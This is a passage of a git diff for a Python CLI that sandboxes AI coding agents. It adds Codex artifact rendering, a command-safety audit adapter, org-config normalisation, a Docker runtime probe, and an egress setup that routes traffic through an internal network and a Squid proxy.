[str(args_raw)] + ) + # Collect env_* keys → env dict + env: dict[str, str] = {} + for key in list(config): + if key.startswith("env_"): + env[key[4:]] = config.pop(key) + if env: + server_config["env"] = env + + return {server_name: server_config}, warnings + + +def _render_native_integration_binding( + binding: ProviderArtifactBinding, + workspace: Path, + bundle_id: str, +) -> tuple[list[Path], list[str]]: + """Render a native integration binding into Codex-specific surfaces. + + Processes known native_config keys: + - ``plugin_bundle``: writes plugin manifest under ``.codex-plugin/`` + - ``rules``: writes rule metadata under ``.codex/rules/`` + - ``hooks``: writes hook metadata into ``.codex/hooks.json`` (merge-safe) + - ``instructions``: writes instruction metadata under + ``.codex/.scc-managed/instructions/`` + + Returns: + (rendered_paths, warnings) + + Raises: + MaterializationError: If any file write operation fails. + MergeConflictError: If hooks.json has conflicting SCC-managed keys + from a different bundle that cannot be safely merged. + """ + rendered: list[Path] = [] + warnings: list[str] = [] + config = binding.native_config + + # ── plugin_bundle ────────────────────────────────────────────────────── + if "plugin_bundle" in config: + plugin_ref = config["plugin_bundle"] + plugin_dir = workspace / CODEX_PLUGIN_DIR + + plugin_manifest: dict[str, Any] = { + "source": plugin_ref, + "provider": "codex", + "bundle_id": bundle_id, + "managed_by": "scc", + } + plugin_path = plugin_dir / "plugin.json" + try: + plugin_dir.mkdir(parents=True, exist_ok=True) + plugin_path.write_text(json.dumps(plugin_manifest, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=f"plugin:{plugin_ref}", + target_path=str(plugin_path), + reason=str(exc), + ) from exc + rendered.append(plugin_path) + + # ── rules ────────────────────────────────────────────────────────────── + if "rules" in config: + rules_ref = config["rules"] + rules_dir = workspace / CODEX_RULES_DIR + + safe_name = Path(rules_ref).stem + rules_metadata: dict[str, Any] = { + "source": rules_ref, + "provider": "codex", + "bundle_id": bundle_id, + "managed_by": "scc", + } + rules_path = rules_dir / f"{safe_name}.rules.json" + try: + rules_dir.mkdir(parents=True, exist_ok=True) + rules_path.write_text(json.dumps(rules_metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=f"rules:{rules_ref}", + target_path=str(rules_path), + reason=str(exc), + ) from exc + rendered.append(rules_path) + + # ── hooks ────────────────────────────────────────────────────────────── + if "hooks" in config: + hooks_ref = config["hooks"] + codex_dir = workspace / CODEX_CONFIG_DIR + + hooks_metadata: dict[str, Any] = { + "source": hooks_ref, + "provider": "codex", + "bundle_id": bundle_id, + "managed_by": "scc", + } + hooks_path = codex_dir / "hooks.json" + + # Merge strategy: read existing file, update SCC-managed entries. + # The entire read-merge-write sequence is wrapped because even + # hooks_path.exists() can raise PermissionError on a locked dir. + try: + existing_hooks: dict[str, Any] = {} + if hooks_path.exists(): + try: + existing_hooks = json.loads(hooks_path.read_text()) + except json.JSONDecodeError: + warnings.append(f"Could not parse existing {hooks_path}; overwriting") + + existing_hooks.setdefault("scc_managed", {})[bundle_id] = hooks_metadata + codex_dir.mkdir(parents=True, exist_ok=True) + hooks_path.write_text(json.dumps(existing_hooks, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=f"hooks:{hooks_ref}", + target_path=str(hooks_path), + reason=str(exc), + ) from exc + rendered.append(hooks_path) + + # ── instructions ─────────────────────────────────────────────────────── + if "instructions" in config: + instructions_ref = config["instructions"] + instructions_dir = workspace / SCC_MANAGED_DIR / INSTRUCTIONS_SUBDIR + + safe_name = Path(instructions_ref).stem + instructions_metadata: dict[str, Any] = { + "source": instructions_ref, + "provider": "codex", + "bundle_id": bundle_id, + "managed_by": "scc", + } + instr_path = instructions_dir / f"{safe_name}.json" + try: + instructions_dir.mkdir(parents=True, exist_ok=True) + instr_path.write_text(json.dumps(instructions_metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=f"instructions:{instructions_ref}", + target_path=str(instr_path), + reason=str(exc), + ) from exc + rendered.append(instr_path) + + return rendered, warnings + + +# --------------------------------------------------------------------------- +# Binding classifier +# --------------------------------------------------------------------------- + + +def _classify_binding( + binding: ProviderArtifactBinding, +) -> str: + """Classify a binding as 'skill', 'mcp', 'native', or 'unknown'. + + Classification order: + 1. native_config contains Codex integration keys → native + 2. transport_type is set → mcp + 3. native_ref is set (no integration keys) → skill + 4. otherwise → unknown + """ + native_keys = set(binding.native_config.keys()) + if native_keys & _INTEGRATION_KEYS: + return "native" + if binding.transport_type: + return "mcp" + if binding.native_ref: + return "skill" + return "unknown" + + +# --------------------------------------------------------------------------- +# Portable artifact rendering (D023) +# --------------------------------------------------------------------------- + + +def _render_portable_skill( + artifact: PortableArtifact, + workspace: Path, + bundle_id: str, +) -> tuple[list[Path], list[str]]: + """Render a portable skill that has no provider-specific binding. + + Uses the artifact's source metadata to write skill placement metadata + under ``/.agents/skills//skill.json``. + + Returns: + (rendered_paths, warnings) + + Raises: + MaterializationError: If the skill metadata file cannot be written. + """ + rendered: list[Path] = [] + warnings: list[str] = [] + + safe_name = artifact.name.replace("/", "_").replace("\\", "_").replace("..", "_") + skill_dir = workspace / SKILLS_DIR / safe_name + + metadata: dict[str, Any] = { + "name": artifact.name, + "provider": "codex", + "bundle_id": bundle_id, + "managed_by": "scc", + "portable": True, + } + if artifact.source_type: + metadata["source_type"] = artifact.source_type + if artifact.source_url: + metadata["source_url"] = artifact.source_url + if artifact.source_path: + metadata["source_path"] = artifact.source_path + if artifact.source_ref: + metadata["source_ref"] = artifact.source_ref + if artifact.version: + metadata["version"] = artifact.version + + metadata_path = skill_dir / "skill.json" + try: + skill_dir.mkdir(parents=True, exist_ok=True) + metadata_path.write_text(json.dumps(metadata, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=bundle_id, + artifact_name=artifact.name, + target_path=str(metadata_path), + reason=str(exc), + ) from exc + rendered.append(metadata_path) + + return rendered, warnings + + +def _render_portable_mcp( + artifact: PortableArtifact, + bundle_id: str, +) -> tuple[dict[str, Any], list[str]]: + """Render a portable MCP server that has no provider-specific binding. + + Uses the artifact's source metadata to produce an .mcp.json fragment + entry. For MCP servers with source_url, renders as SSE transport. + + Returns: + (mcp_config_dict, warnings) + """ + warnings: list[str] = [] + + server_name = artifact.name + server_config: dict[str, Any] = { + "managed_by": "scc", + "bundle_id": bundle_id, + "portable": True, + } + + if artifact.source_url: + server_config["type"] = "sse" + server_config["url"] = artifact.source_url + else: + warnings.append( + f"Portable MCP server '{artifact.name}' in bundle '{bundle_id}' " + "has no source_url; cannot determine connection endpoint" + ) + server_config["type"] = "sse" + + if artifact.source_ref: + server_config["source_ref"] = artifact.source_ref + if artifact.version: + server_config["version"] = artifact.version + + return {server_name: server_config}, warnings + + +# --------------------------------------------------------------------------- +# Main renderer +# --------------------------------------------------------------------------- + + +def render_codex_artifacts( + plan: ArtifactRenderPlan, + workspace: Path, +) -> RendererResult: + """Project an ArtifactRenderPlan into Codex-native surfaces. + + Consumes a provider-neutral ArtifactRenderPlan produced by the core + bundle resolver and renders it into Codex's native file structures. + + Rendering is deterministic and idempotent — the same plan and workspace + always produce the same output. + + The renderer dispatches each binding based on its characteristics: + - Bindings with integration-specific native_config keys → native integration + - Bindings with transport_type → MCP server definition + - Bindings with only native_ref → skill placement + + The ``mcp_fragment`` in the result is NOT written to ``.mcp.json`` + by the renderer. The calling launch pipeline (T05) owns the merge + into the active MCP config file. + + Args: + plan: ArtifactRenderPlan to render (must target provider 'codex'). + workspace: Root directory for the workspace (project root). + + Returns: + RendererResult with rendered paths, skipped items, warnings, + and an MCP fragment for the caller to merge. + """ + if plan.provider != "codex": + return RendererResult( + warnings=(f"Plan targets provider '{plan.provider}', not 'codex'; nothing rendered",), + skipped_artifacts=plan.effective_artifacts, + ) + + all_rendered: list[Path] = [] + all_warnings: list[str] = [] + merged_mcp: dict[str, Any] = {} + + for binding in plan.bindings: + if binding.provider != "codex": + all_warnings.append( + f"Binding for provider '{binding.provider}' found in " + f"Codex plan for bundle '{plan.bundle_id}'; skipping" + ) + continue + + kind = _classify_binding(binding) + + if kind == "native": + paths, warnings = _render_native_integration_binding(binding, workspace, plan.bundle_id) + all_rendered.extend(paths) + all_warnings.extend(warnings) + + elif kind == "mcp": + mcp_config, warnings = _render_mcp_binding(binding, plan.bundle_id) + all_warnings.extend(warnings) + merged_mcp.setdefault("mcpServers", {}).update(mcp_config) + + elif kind == "skill": + paths, warnings = _render_skill_binding(binding, workspace, plan.bundle_id) + all_rendered.extend(paths) + all_warnings.extend(warnings) + + else: + all_warnings.append( + f"Binding in bundle '{plan.bundle_id}' has no native_ref, " + "transport_type, or recognised native_config keys; skipping" + ) + + # Render portable artifacts that have no provider-specific binding (D023) + for portable in plan.portable_artifacts: + if portable.kind == ArtifactKind.SKILL: + paths, warnings = _render_portable_skill(portable, workspace, plan.bundle_id) + all_rendered.extend(paths) + all_warnings.extend(warnings) + + elif portable.kind == ArtifactKind.MCP_SERVER: + mcp_config, warnings = _render_portable_mcp(portable, plan.bundle_id) + all_warnings.extend(warnings) + merged_mcp.setdefault("mcpServers", {}).update(mcp_config) + + # Write the MCP fragment to a per-bundle audit file for debug/diagnostics + if merged_mcp: + codex_dir = workspace / CODEX_CONFIG_DIR + + safe_bundle = plan.bundle_id.replace("/", "_").replace("\\", "_") + fragment_path = codex_dir / f".scc-mcp-{safe_bundle}.json" + try: + codex_dir.mkdir(parents=True, exist_ok=True) + fragment_path.write_text(json.dumps(merged_mcp, indent=2) + "\n") + except OSError as exc: + raise MaterializationError( + bundle_id=plan.bundle_id, + artifact_name="mcp_fragment", + target_path=str(fragment_path), + reason=str(exc), + ) from exc + all_rendered.append(fragment_path) + + return RendererResult( + rendered_paths=tuple(all_rendered), + skipped_artifacts=plan.skipped, + warnings=tuple(all_warnings), + mcp_fragment=merged_mcp, + ) diff --git a/src/scc_cli/adapters/codex_safety_adapter.py b/src/scc_cli/adapters/codex_safety_adapter.py new file mode 100644 index 0000000..9783bd9 --- /dev/null +++ b/src/scc_cli/adapters/codex_safety_adapter.py @@ -0,0 +1,47 @@ +"""Codex-specific safety adapter — UX formatting and audit emission.""" + +from __future__ import annotations + +from scc_cli.core.contracts import AuditEvent, SafetyCheckResult, SafetyPolicy +from scc_cli.core.enums import SeverityLevel +from scc_cli.ports.audit_event_sink import AuditEventSink +from scc_cli.ports.safety_engine import SafetyEngine + + +class CodexSafetyAdapter: + """Wraps SafetyEngine with Codex-specific user messages and audit events.""" + + def __init__(self, engine: SafetyEngine, audit_sink: AuditEventSink) -> None: + self._engine = engine + self._audit_sink = audit_sink + + def check_command(self, command: str, policy: SafetyPolicy) -> SafetyCheckResult: + """Evaluate *command* against *policy*, emit audit, return formatted result.""" + verdict = self._engine.evaluate(command, policy) + + severity = SeverityLevel.WARNING if not verdict.allowed else SeverityLevel.INFO + if verdict.allowed: + user_message = "[Codex] Command allowed" + else: + user_message = f"[Codex] Command blocked: {verdict.reason}" + + event = AuditEvent( + event_type="safety.check", + message=user_message, + severity=severity, + subject="codex", + metadata={ + "provider_id": "codex", + "command": command, + "verdict_allowed": str(verdict.allowed).lower(), + "matched_rule": verdict.matched_rule or "", + "command_family": verdict.command_family or "", + }, + ) + self._audit_sink.append(event) + + return SafetyCheckResult( + verdict=verdict, + user_message=user_message, + audit_emitted=True, + ) diff --git a/src/scc_cli/adapters/config_normalizer.py b/src/scc_cli/adapters/config_normalizer.py index a60ec7b..dcd95dc 100644 --- a/src/scc_cli/adapters/config_normalizer.py +++ b/src/scc_cli/adapters/config_normalizer.py @@ -9,9 +9,17 @@ from typing import Any +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + GovernedArtifact, + ProviderArtifactBinding, +) from scc_cli.ports.config_models import ( DefaultsConfig, DelegationConfig, + GovernedArtifactsCatalog, MarketplaceConfig, MCPServerConfig, NormalizedOrgConfig, @@ -21,8 +29,10 @@ OrganizationInfo, OrganizationSource, ProjectsDelegation, + SafetyNetConfig, SecurityConfig, SessionSettings, + StatsConfig, TeamDelegation, TeamsDelegation, ) @@ -63,9 +73,10 @@ def _normalize_session_settings(raw: dict[str, Any] | None) -> SessionSettings: """Normalize session settings from raw dict.""" if not raw: return SessionSettings() + auto_resume_raw = raw.get("auto_resume") return SessionSettings( timeout_hours=raw.get("timeout_hours"), - auto_resume=bool(raw.get("auto_resume", False)), + auto_resume=bool(auto_resume_raw) if auto_resume_raw is not None else None, ) @@ -98,8 +109,30 @@ def _normalize_team_config(name: str, raw: dict[str, Any]) -> NormalizedTeamConf marketplace=raw.get("marketplace"), additional_plugins=tuple(raw.get("additional_plugins", [])), additional_mcp_servers=mcp_servers, + network_policy=raw.get("network_policy"), session=_normalize_session_settings(raw.get("session")), delegation=delegation, + enabled_bundles=tuple(raw.get("enabled_bundles", [])), + ) + + +def _normalize_safety_net(raw: dict[str, Any] | None) -> SafetyNetConfig: + """Normalize safety_net config within security section.""" + if not raw or not isinstance(raw, dict): + return SafetyNetConfig() + return SafetyNetConfig( + action=str(raw.get("action", "block")), + rules=dict(raw.get("rules", {})) if isinstance(raw.get("rules"), dict) else {}, + ) + + +def _normalize_stats(raw: dict[str, Any] | None) -> StatsConfig: + """Normalize stats/telemetry config.""" + if not raw or not isinstance(raw, dict): + return StatsConfig() + return StatsConfig( + enabled=bool(raw.get("enabled", False)), + endpoint=raw.get("endpoint"), ) @@ -112,6 +145,7 @@ def _normalize_security(raw: dict[str, Any] | None) -> SecurityConfig: blocked_mcp_servers=tuple(raw.get("blocked_mcp_servers", [])), allow_stdio_mcp=bool(raw.get("allow_stdio_mcp", False)), allowed_stdio_prefixes=tuple(raw.get("allowed_stdio_prefixes", [])), + safety_net=_normalize_safety_net(raw.get("safety_net")), ) @@ -167,6 +201,118 @@ def _normalize_marketplace(name: str, raw: dict[str, Any]) -> MarketplaceConfig: ) +def _parse_install_intent(raw_value: str | None) -> ArtifactInstallIntent: + """Parse install_intent string to enum, defaulting to AVAILABLE.""" + if not raw_value: + return ArtifactInstallIntent.AVAILABLE + try: + return ArtifactInstallIntent(raw_value) + except ValueError: + return ArtifactInstallIntent.AVAILABLE + + +def _parse_artifact_kind(raw_value: str | None) -> ArtifactKind: + """Parse artifact kind string to enum, defaulting to NATIVE_INTEGRATION.""" + if not raw_value: + return ArtifactKind.NATIVE_INTEGRATION + try: + return ArtifactKind(raw_value) + except ValueError: + return ArtifactKind.NATIVE_INTEGRATION + + +def _normalize_governed_artifact(name: str, raw: dict[str, Any]) -> GovernedArtifact: + """Normalize one governed artifact from raw config dict.""" + source_raw = raw.get("source", {}) + if not isinstance(source_raw, dict): + source_raw = {} + + return GovernedArtifact( + kind=_parse_artifact_kind(raw.get("kind")), + name=name, + version=raw.get("version"), + publisher=raw.get("publisher"), + pinned=bool(raw.get("pinned", False)), + source_type=source_raw.get("type"), + source_url=source_raw.get("url"), + source_path=source_raw.get("path"), + source_ref=source_raw.get("ref"), + install_intent=_parse_install_intent(raw.get("install_intent")), + ) + + +def _normalize_provider_bindings( + raw_bindings: dict[str, Any] | None, +) -> tuple[ProviderArtifactBinding, ...]: + """Normalize provider bindings from raw artifact config.""" + if not raw_bindings or not isinstance(raw_bindings, dict): + return () + + result: list[ProviderArtifactBinding] = [] + for provider_name, binding_raw in raw_bindings.items(): + if not isinstance(binding_raw, dict): + continue + native_config = {k: str(v) for k, v in binding_raw.items() if k not in ("transport_type",)} + result.append( + ProviderArtifactBinding( + provider=provider_name, + native_ref=binding_raw.get("native_ref"), + native_config=native_config, + transport_type=binding_raw.get("transport_type"), + ) + ) + return tuple(result) + + +def _normalize_artifact_bundle(name: str, raw: dict[str, Any]) -> ArtifactBundle: + """Normalize one artifact bundle from raw config dict.""" + return ArtifactBundle( + name=name, + description=raw.get("description", ""), + artifacts=tuple(raw.get("members", [])), + install_intent=_parse_install_intent(raw.get("install_intent")), + ) + + +def _normalize_governed_artifacts_catalog( + raw: dict[str, Any] | None, +) -> GovernedArtifactsCatalog: + """Normalize the full governed_artifacts section from org config.""" + if not raw or not isinstance(raw, dict): + return GovernedArtifactsCatalog() + + artifacts_raw = raw.get("artifacts", {}) + if not isinstance(artifacts_raw, dict): + artifacts_raw = {} + + artifacts: dict[str, GovernedArtifact] = {} + bindings: dict[str, tuple[ProviderArtifactBinding, ...]] = {} + + for art_name, art_raw in artifacts_raw.items(): + if not isinstance(art_raw, dict): + continue + artifacts[art_name] = _normalize_governed_artifact(art_name, art_raw) + art_bindings = _normalize_provider_bindings(art_raw.get("bindings")) + if art_bindings: + bindings[art_name] = art_bindings + + bundles_raw = raw.get("bundles", {}) + if not isinstance(bundles_raw, dict): + bundles_raw = {} + + bundles: dict[str, ArtifactBundle] = {} + for bundle_name, bundle_raw in bundles_raw.items(): + if not isinstance(bundle_raw, dict): + continue + bundles[bundle_name] = _normalize_artifact_bundle(bundle_name, bundle_raw) + + return GovernedArtifactsCatalog( + artifacts=artifacts, + bindings=bindings, + bundles=bundles, + ) + + def normalize_org_config(raw: dict[str, Any]) -> NormalizedOrgConfig: """Normalize a raw organization config dict to typed model. @@ -187,6 +333,8 @@ def normalize_org_config(raw: dict[str, Any]) -> NormalizedOrgConfig: name: _normalize_marketplace(name, config) for name, config in marketplaces_raw.items() } + config_source = raw.get("config_source") + return NormalizedOrgConfig( organization=org_info, security=_normalize_security(raw.get("security")), @@ -194,6 +342,9 @@ def normalize_org_config(raw: dict[str, Any]) -> NormalizedOrgConfig: delegation=_normalize_delegation(raw.get("delegation")), profiles=profiles, marketplaces=marketplaces, + stats=_normalize_stats(raw.get("stats")), + governed_artifacts=_normalize_governed_artifacts_catalog(raw.get("governed_artifacts")), + config_source=str(config_source) if config_source is not None else None, ) diff --git a/src/scc_cli/adapters/docker_runtime_probe.py b/src/scc_cli/adapters/docker_runtime_probe.py new file mode 100644 index 0000000..3b62dcb --- /dev/null +++ b/src/scc_cli/adapters/docker_runtime_probe.py @@ -0,0 +1,98 @@ +"""Docker runtime probe adapter. + +Detects Docker runtime capabilities by calling existing helpers in +scc_cli.docker. Never raises from probe() — returns truthful state. +""" + +from __future__ import annotations + +from scc_cli.core.contracts import RuntimeInfo +from scc_cli.docker import ( + _check_docker_installed, + check_docker_sandbox, + get_docker_desktop_version, + get_docker_version, + run_command, + run_command_bool, +) + + +class DockerRuntimeProbe: + """Probe the local Docker runtime and return capability information.""" + + def probe(self) -> RuntimeInfo: + """Detect Docker runtime capabilities. + + Each detection step is defensive: failure at any point produces + a RuntimeInfo reflecting only what was successfully detected. + + Returns: + RuntimeInfo describing the Docker runtime state. + """ + if not _check_docker_installed(): + return RuntimeInfo( + runtime_id="docker", + display_name="Docker (not installed)", + cli_name="docker", + supports_oci=False, + supports_internal_networks=False, + supports_host_network=False, + daemon_reachable=False, + sandbox_available=False, + preferred_backend=None, + ) + + version = get_docker_version() + daemon_reachable = run_command_bool(["docker", "info"], timeout=5) + + if not daemon_reachable: + return RuntimeInfo( + runtime_id="docker", + display_name="Docker (daemon not running)", + cli_name="docker", + supports_oci=True, + supports_internal_networks=False, + supports_host_network=False, + version=version, + daemon_reachable=False, + sandbox_available=False, + preferred_backend=None, + ) + + # Rootless detection via SecurityOptions + rootless: bool | None = None + try: + security_opts = run_command( + ["docker", "info", "--format", "{{.SecurityOptions}}"], + timeout=5, + ) + if security_opts is not None: + rootless = "rootless" in security_opts + except Exception: + rootless = None + + desktop_version = get_docker_desktop_version() + sandbox_available = check_docker_sandbox() + + display_name = "Docker Desktop" if desktop_version else "Docker Engine" + + # Preferred backend selection + if sandbox_available: + preferred_backend: str | None = "docker-sandbox" + else: + preferred_backend = "oci" + + return RuntimeInfo( + runtime_id="docker", + display_name=display_name, + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + rootless=rootless, + version=version, + desktop_version=desktop_version, + daemon_reachable=True, + sandbox_available=sandbox_available, + preferred_backend=preferred_backend, + ) diff --git a/src/scc_cli/adapters/docker_sandbox_runtime.py b/src/scc_cli/adapters/docker_sandbox_runtime.py index ab3d814..01ee3bb 100644 --- a/src/scc_cli/adapters/docker_sandbox_runtime.py +++ b/src/scc_cli/adapters/docker_sandbox_runtime.py @@ -1,11 +1,34 @@ -"""Docker sandbox runtime adapter for SandboxRuntime port.""" +"""Docker sandbox runtime adapter for SandboxRuntime port. + +**Legacy Docker Desktop sandbox path.** This adapter wraps the Docker Desktop +``docker sandbox run`` command (Docker Desktop >= 4.50) behind the +``SandboxRuntime`` port interface. It is NOT used by the OCI-based launch path +(see ``adapters/oci_sandbox_runtime.py``). Retained for users whose Docker +Desktop includes the sandbox feature. +""" from __future__ import annotations +from typing import Any + from scc_cli import docker from scc_cli.core.enums import NetworkPolicy +from scc_cli.core.errors import ( + DockerDaemonNotRunningError, + DockerNotFoundError, + DockerVersionError, + SandboxNotAvailableError, +) from scc_cli.core.network_policy import collect_proxy_env -from scc_cli.ports.models import SandboxHandle, SandboxSpec, SandboxState, SandboxStatus +from scc_cli.docker.core import MIN_DOCKER_VERSION, _parse_version +from scc_cli.ports.models import ( + SandboxConflict, + SandboxHandle, + SandboxSpec, + SandboxState, + SandboxStatus, +) +from scc_cli.ports.runtime_probe import RuntimeProbe from scc_cli.ports.sandbox_runtime import SandboxRuntime @@ -23,13 +46,42 @@ def _extract_container_name(cmd: list[str]) -> str | None: class DockerSandboxRuntime(SandboxRuntime): """SandboxRuntime backed by Docker sandbox CLI.""" + def __init__(self, probe: RuntimeProbe) -> None: + self._probe = probe + def ensure_available(self) -> None: - docker.check_docker_available() + """Ensure the Docker runtime is available and ready for sandbox use. + + Uses RuntimeProbe to detect capabilities, then raises the same + exception types as the old docker.check_docker_available() path. + """ + info = self._probe.probe() + + # Docker not installed: no CLI found, no version info + if not info.daemon_reachable and not info.cli_name: + raise DockerNotFoundError() + if not info.daemon_reachable and info.version is None: + raise DockerNotFoundError() + + # Docker installed but daemon not running + if not info.daemon_reachable: + raise DockerDaemonNotRunningError() + + # Desktop version too old + if info.desktop_version: + current = _parse_version(info.desktop_version) + required = _parse_version(MIN_DOCKER_VERSION) + if current < required: + raise DockerVersionError(current_version=info.desktop_version) + + # Sandbox feature not available + if not info.sandbox_available: + raise SandboxNotAvailableError() def run(self, spec: SandboxSpec) -> SandboxHandle: docker.prepare_sandbox_volume_for_credentials() env_vars = dict(spec.env) if spec.env else {} - if spec.network_policy == NetworkPolicy.CORP_PROXY_ONLY.value: + if spec.network_policy == NetworkPolicy.WEB_EGRESS_ENFORCED.value: for key, value in collect_proxy_env().items(): env_vars.setdefault(key, value) runtime_env = env_vars or None @@ -42,7 +94,13 @@ def run(self, spec: SandboxSpec) -> SandboxHandle: env_vars=runtime_env, ) container_name = _extract_container_name(docker_cmd) - plugin_settings = spec.agent_settings.content if spec.agent_settings else None + # Legacy Desktop sandbox path: expects a dict (Claude JSON only). + # Deserialize rendered_bytes back to dict for backward compat. + plugin_settings: dict[str, Any] | None = None + if spec.agent_settings is not None: + import json as _json + + plugin_settings = _json.loads(spec.agent_settings.rendered_bytes) docker.run( docker_cmd, org_config=spec.org_config, @@ -55,6 +113,12 @@ def run(self, spec: SandboxSpec) -> SandboxHandle: name=container_name, ) + def detect_launch_conflict(self, spec: SandboxSpec) -> SandboxConflict | None: + # Legacy Docker Desktop sandboxes already encapsulate their own + # container reuse semantics. M008 can add richer conflict inspection + # here if the Desktop path remains active. + return None + def resume(self, handle: SandboxHandle) -> None: docker.resume_container(handle.sandbox_id) diff --git a/src/scc_cli/adapters/egress_topology.py b/src/scc_cli/adapters/egress_topology.py new file mode 100644 index 0000000..33aa499 --- /dev/null +++ b/src/scc_cli/adapters/egress_topology.py @@ -0,0 +1,249 @@ +"""Docker network topology manager for enforced web-egress. + +Creates an internal-only Docker network, starts a Squid proxy sidecar +as the sole bridge to external networks, and tears everything down +idempotently. + +Topology:: + + ┌──────────────┐ internal-only ┌───────────────┐ bridge + │ agent │ ─────────────────▶ │ scc-proxy │ ──────────▶ Internet + │ container │ scc-egress-{id} │ (Squid 3128) │ (default) + └──────────────┘ └───────────────┘ + +The agent container is attached **only** to the internal network and +reaches the outside world exclusively through the proxy. +""" + +from __future__ import annotations + +import subprocess +import tempfile +from dataclasses import dataclass +from pathlib import Path + +from scc_cli.core.errors import SandboxLaunchError + +# --------------------------------------------------------------------------- +# Constants +# --------------------------------------------------------------------------- + +_PROXY_IMAGE = "scc-egress-proxy:latest" +_PROXY_PORT = 3128 +_PROXY_LABEL = "scc.egress-proxy=true" + +_CREATE_TIMEOUT = 30 +_RUN_TIMEOUT = 60 +_INSPECT_TIMEOUT = 10 +_DEFAULT_TIMEOUT = 15 + + +# --------------------------------------------------------------------------- +# Data transfer object +# --------------------------------------------------------------------------- + + +@dataclass(frozen=True) +class EgressTopologyInfo: + """Result of a successful topology setup. + + Attributes: + network_name: Internal-only Docker network name. + proxy_container_name: Name of the running Squid proxy sidecar. + proxy_endpoint: ``http://:3128`` reachable from the + internal network. + """ + + network_name: str + proxy_container_name: str + proxy_endpoint: str + + +# --------------------------------------------------------------------------- +# Docker subprocess helper (local copy — intentionally decoupled from +# oci_sandbox_runtime._run_docker to avoid cross-adapter imports) +# --------------------------------------------------------------------------- + + +def _run_docker( + args: list[str], + *, + timeout: int = _DEFAULT_TIMEOUT, + check: bool = True, +) -> subprocess.CompletedProcess[str]: + """Run a ``docker`` subprocess with standard error handling. + + Raises: + SandboxLaunchError: on non-zero exit or timeout. + """ + cmd = ["docker", *args] + try: + return subprocess.run( + cmd, + capture_output=True, + text=True, + timeout=timeout, + check=check, + ) + except subprocess.TimeoutExpired as exc: + raise SandboxLaunchError( + user_message=f"Docker command timed out after {timeout}s", + command=" ".join(cmd), + stderr=str(exc), + ) from exc + except subprocess.CalledProcessError as exc: + raise SandboxLaunchError( + user_message="Docker command failed", + command=" ".join(cmd), + stderr=exc.stderr or "", + ) from exc + + +# --------------------------------------------------------------------------- +# Public class +# --------------------------------------------------------------------------- + + +class NetworkTopologyManager: + """Manages Docker network topology for enforced web-egress sessions. + + Each session gets an internal-only Docker network and a Squid proxy + sidecar that is dual-homed (internal + bridge). The agent container + is later attached to the internal network with ``http_proxy`` / + ``https_proxy`` environment variables pointing at the sidecar. + """ + + def __init__(self, session_id: str) -> None: + self._session_id = session_id + self._network_name = f"scc-egress-{session_id}" + self._proxy_name = f"scc-proxy-{session_id}" + self._acl_tmpfile: Path | None = None + + # -- public ------------------------------------------------------------ + + def setup(self, acl_config: str) -> EgressTopologyInfo: + """Create the internal network, start the proxy, return topology info. + + On failure at any stage, already-created resources are cleaned up + before the ``SandboxLaunchError`` propagates. + """ + # 1. Create internal-only network + _run_docker( + ["network", "create", "--internal", self._network_name], + timeout=_CREATE_TIMEOUT, + ) + + try: + # 2. Write ACL config to a temp file for volume mount + acl_file = self._write_acl_file(acl_config) + + # 3. Start proxy container on the internal network + _run_docker( + [ + "run", + "-d", + "--name", + self._proxy_name, + "--network", + self._network_name, + "--label", + _PROXY_LABEL, + "-v", + f"{acl_file}:/etc/squid/acl-rules.conf:ro", + _PROXY_IMAGE, + ], + timeout=_RUN_TIMEOUT, + ) + + # 4. Connect proxy to the default bridge (dual-homed) + _run_docker( + ["network", "connect", "bridge", self._proxy_name], + timeout=_DEFAULT_TIMEOUT, + ) + + # 5. Get proxy IP on the *internal* network + proxy_ip = self._get_proxy_internal_ip() + + return EgressTopologyInfo( + network_name=self._network_name, + proxy_container_name=self._proxy_name, + proxy_endpoint=f"http://{proxy_ip}:{_PROXY_PORT}", + ) + except Exception: + # Any failure after network creation → clean up what we created + self.teardown() + raise + + def teardown(self) -> None: + """Idempotently remove the proxy container and internal network. + + Errors from ``docker rm`` / ``docker network rm`` are silently + ignored so teardown can be called unconditionally. + """ + # Remove proxy container (ignore errors — may not exist) + try: + _run_docker( + ["rm", "-f", self._proxy_name], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + except SandboxLaunchError: + pass # timeout during teardown — best-effort + + # Remove internal network (ignore errors — may not exist) + try: + _run_docker( + ["network", "rm", self._network_name], + timeout=_DEFAULT_TIMEOUT, + check=False, + ) + except SandboxLaunchError: + pass # timeout during teardown — best-effort + + # Clean up ACL temp file if we created one + if self._acl_tmpfile is not None: + self._acl_tmpfile.unlink(missing_ok=True) + self._acl_tmpfile = None + + # -- private ----------------------------------------------------------- + + def _write_acl_file(self, acl_config: str) -> Path: + """Write *acl_config* to a named temp file and return its path.""" + fd, path_str = tempfile.mkstemp(prefix="scc-acl-", suffix=".conf") + path = Path(path_str) + try: + path.write_text(acl_config) + except Exception: + path.unlink(missing_ok=True) + raise + finally: + # Close the OS-level file descriptor (write_text opens its own) + import os + + os.close(fd) + self._acl_tmpfile = path + return path + + def _get_proxy_internal_ip(self) -> str: + """Inspect the proxy container and return its IP on the internal network. + + Raises: + SandboxLaunchError: if the IP cannot be determined. + """ + result = _run_docker( + [ + "inspect", + "--format", + f"{{{{.NetworkSettings.Networks.{self._network_name}.IPAddress}}}}", + self._proxy_name, + ], + timeout=_INSPECT_TIMEOUT, + ) + ip_addr = result.stdout.strip() + if not ip_addr: + raise SandboxLaunchError( + user_message="Could not determine proxy internal IP address", + command=f"docker inspect {self._proxy_name}", + stderr="Empty IP address returned for internal network", + ) + return ip_addr diff --git a/src/scc_cli/adapters/local_audit_event_sink.py b/src/scc_cli/adapters/local_audit_event_sink.py new file mode 100644 index 0000000..8363dfa --- /dev/null +++ b/src/scc_cli/adapters/local_audit_event_sink.py @@ -0,0 +1,44 @@ +"""Local append-only JSONL audit sink.""" + +from __future__ import annotations + +import json +import os +from dataclasses import asdict, dataclass +from pathlib import Path + +from scc_cli import config +from scc_cli.core.contracts import AuditEvent +from 